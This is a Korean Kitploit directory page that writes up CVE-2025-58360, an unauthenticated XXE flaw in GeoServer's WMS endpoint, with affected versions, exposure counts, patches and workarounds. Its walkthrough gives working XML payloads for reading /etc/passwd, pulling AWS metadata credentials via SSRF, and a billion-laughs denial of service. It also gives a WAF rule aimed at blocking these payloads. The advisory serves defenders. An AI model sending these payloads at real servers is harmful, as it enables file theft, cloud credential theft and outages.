Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
도구/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

저장소 보기
8개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔓 🛰️ 'CVE-2025-58360' GeoServer WMS 엔드포인트 XXE 공격에 취약 🌟

GeoServer

🏷️ 기본 정보

  • CVE ID: CVE-2025-58360
  • 공개일: 📅 2025년 11월 25일
  • 최종 수정일: 📅 2025년 11월 25일 (11월 26일 기준 여전히 새롭습니다)
  • 취약점 유형: XML 외부 엔터티 (XXE) – CWE-611
  • 영향을 받는 소프트웨어: GeoServer (Java로 작성된 오픈소스 지리공간 서버)
  • 심각도: 🔥 높음 – CVSS v3.1 기본 점수 7.5
    • 벡터: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • 실제 악용 여부: 🟡 아직 관찰되지 않음 (2025년 11월 26일) – 그러나 공개 PoC가 유포되고 있음
  • 인증 필요: ❌ 없음 – 완전히 인증되지 않음
  • 사용자 상호 작용 필요: ❌ 없음

🎨 이 버그가 특별한 (그리고 위험한) 이유

이것은 웹 맵 서비스(WMS) GetMap 엔드포인트의 고전적이지만 치명적인 XXE입니다.
공격자는 다음을 수행할 수 있습니다:

  • 📂 GeoServer 프로세스가 접근 가능한 모든 파일 읽기 (/etc/passwd, geoserver.xml, 개인 키 등)
  • 🌐 내부 네트워크 스캔 또는 메타데이터 엔드포인트(예: AWS/GCP) 공격을 위한 서버 측 요청 위조(SSRF) 수행
  • 💣 엔터티 확장 공격("billion laughs")으로 서비스 거부(DoS) 유발
  • 🔗 잠재적으로 다른 결함과 연계하여 완전한 RCE 가능 (직접적이지는 않지만 잘못 구성된 설정에서 가능)

🛡️ 영향을 받는 버전 (상세 표)

🌍 글로벌 노출 (2025년 11월 26일 기준 실시간)

→ 현재 인터넷에 노출된 잠재적으로 취약한 서버가 수만 대입니다! 🌐

🧨 전체 기술 익스플로잇 워크스루

엔드포인트: POST /geoserver/wms
핵심 매개변수: SLD_BODY (원시 XML 스타일링 허용)
취약한 코드 경로: XML 파서가 외부 엔터티 해석을 비활성화하지 않음 → 고전적인 XXE.

f77f64d7c92fd31b29d537f5205da524

예제 1 – 파일 노출 (/etc/passwd)

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
  <sld:UserLayer>
    <sld:LayerFeatureConstraints>
      <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
    </sld:LayerFeatureConstraints>
  </sld:UserLayer>
</sld:StyledLayerDescriptor>

→ 응답에 /etc/passwd의 내용이 포함됨 🎉

예제 2 – 내부 메타데이터 SSRF (AWS 예시)

root@kitploit:~
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

→ EC2에서 실행 중인 경우 임시 AWS 자격 증명 유출.

예제 3 – Billion Laughs DoS

root@kitploit:~
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>

→ 수 초 안에 수 기가바이트의 RAM 소모 💥

🛠️ 공식 패치 및 다운로드

버전출시일다운로드 링크
2.27.02025년 11월 25일https://geoserver.org/release/stable/
2.26.32025년 11월 25일

Docker 사용자:

root@kitploit:~
docker pull osgeo/geoserver:2.27.0

🔧 우회 방법 (즉시 패치가 불가능한 경우)

  1. WAF/mod_security 규칙으로 위험한 XML 차단:
    <!ENTITY 또는 SYSTEM "file://를 포함하는 요청 거부
  2. SLD_BODY 매개변수 전역 비활성화 (필요하지 않은 경우)
  3. GeoServer를 읽기 전용 파일시스템으로 실행 + 기능 제거
  4. 인증되지 않은 사용자에게 XML 본문을 제거하는 리버스 프록시 뒤에 배치

📢 공식 참조 및 PoC

  • NVD 항목: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  • GeoServer 권고: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
  • JIRA 티켓: https://osgeo-org.atlassian.net/browse/GEOS-11682
  • 공개 안전 PoC (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
  • Nuclei 템플릿 (자동 탐지): 이미 메인 브랜치에 병합됨

⏰ 타임라인

날짜이벤트
2025년 11월 이전XBOW AI 스캐너에 의해 자동 발견
2025년 11월 25일조정된 공개 → 패치 릴리스
2025년 11월 25일CVE 할당 및 게시
2025년 11월 26일PoCs 확산, 노출 스캔 급증

✨ 마무리

이것은 수만 개의 인터넷 연결 인스턴스가 있는 널리 배포된 지리공간 플랫폼을 공격하는 교과서적인 XXE입니다.
공개 당일 패치가 릴리스되었습니다 — 속도에 대한 GeoServer 팀에게 큰 찬사를 보냅니다! 🏆
그러나 패치 가용성과 대규모 악용 사이의 시간이 빠르게 줄어들고 있습니다.

GeoServer를 실행 중이라면 → 오늘 업그레이드하세요.
다음 헤드라인이 되지 마세요.

안전하고 빛나세요! 🛡️✨

도구 다운로드
구성 요소취약한 버전수정된 버전상태
GeoServer Standalone2.26.0 – 2.26.1
≤ 2.25.5
2.26.3, 2.25.6, 2.27.0🔴 취약함
Docker (osgeo/geoserver)2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.27.0🔴 취약함
Maven org.geoserver:gs-wms2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 취약함
Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 취약함
GeoServer 2.27.x 및 신규–이미 패치됨✅ 안전
출처노출된 인스턴스비고
ZoomEye~49,400app:"GeoServer" 검색
FOFA~24,000지난 1년간 결과
Shodan~31,000포트 8080 + 제목 일치
GobySec~20,000공용 네트워크 스캔
유지보수 브랜치 패치
2.25.62025년 11월 25일이전 지원 브랜치